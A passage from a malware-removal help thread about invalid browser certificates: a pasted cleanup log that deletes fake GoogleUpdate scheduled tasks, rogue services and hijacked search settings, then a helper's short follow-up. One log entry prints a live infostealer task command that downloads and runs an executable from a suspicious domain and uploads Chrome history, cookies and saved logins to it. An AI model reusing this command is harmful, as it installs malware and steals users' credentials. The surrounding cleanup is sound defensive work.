HKLM\SOFTWARE\Policies\Google => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2C093763-EE42-49CF-8891-F189A4AB542C}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2C093763-EE42-49CF-8891-F189A4AB542C}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{326F35B1-9030-43D1-BD0D-5DBD49CECAFF}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{326F35B1-9030-43D1-BD0D-5DBD49CECAFF}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore" => removed successfully
http://1oivviovidwopopin.info/f2/OSJPN1IXJW.exe -s -k -o "C:\Users\PC\AppData\Local\Temp\OSJPN1IXJW.exe" && cd C:\Users\PC\AppData\Local\Temp\ && "OSJPN1IXJW.exe" V04J2WGO4Hf2 DYY04N8UKN 1Q541DFWIX OEROW4YA69 & copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\PC\AppData\Local\Temp\J1O2156BEB" > NUL && cd C:\Users\PC\AppData\Local\Temp\ && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" -X POST -H "Content-type: application/octet-stream" --data @J1O2156BEB http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppDa (the data entry has 678 more characters). <==== ATTENTION => Error: No automatic fix found for this entry.
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{74344F07-42C6-4622-9312-152A6B0AECFF}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{74344F07-42C6-4622-9312-152A6B0AECFF}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FF6375C1-1AC9-466C-80D7-F1443D3F6986}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FF6375C1-1AC9-466C-80D7-F1443D3F6986}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA" => removed successfully
HKLM\System\CurrentControlSet\Services\tmlwf => removed successfully
tmlwf => service removed successfully
HKLM\System\CurrentControlSet\Services\tmwfp => removed successfully
tmwfp => service removed successfully
"C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA" => not found
"C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore" => not found
HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{8B480070-D37D-4090-A063-7A429F849652} => removed successfully
HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{BE5C2E39-090F-46A2-AFAA-47540743B4FE} => removed successfully
HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{CA8FA699-91CD-412F-9D13-9B1222F4370E} => removed successfully
HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{DEDF773D-E27B-485E-8E7D-85C5B0EB5A67} => removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => value restored successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => removed successfully
"HKU\S-1-5-21-1878501408-2484808434-785971923-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => removed successfully
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => removed successfully

=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 39858649 B
Java, Flash, Steam htmlcache => 75 B
Windows/system/drivers => 353557217 B
Edge => 0 B
Chrome => 8015508 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 83565 B
systemprofile32 => 149793 B
LocalService => 216501 B
NetworkService => 1692181 B
PC => 4805834241 B

RecycleBin => 1908484100 B
EmptyTemp: => 6.6 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 21:10:35 ====

Re: invalid certificates in browsers

Posted: 26 Oct 2021 21:07
by Rudy
Deleted. Has anything changed?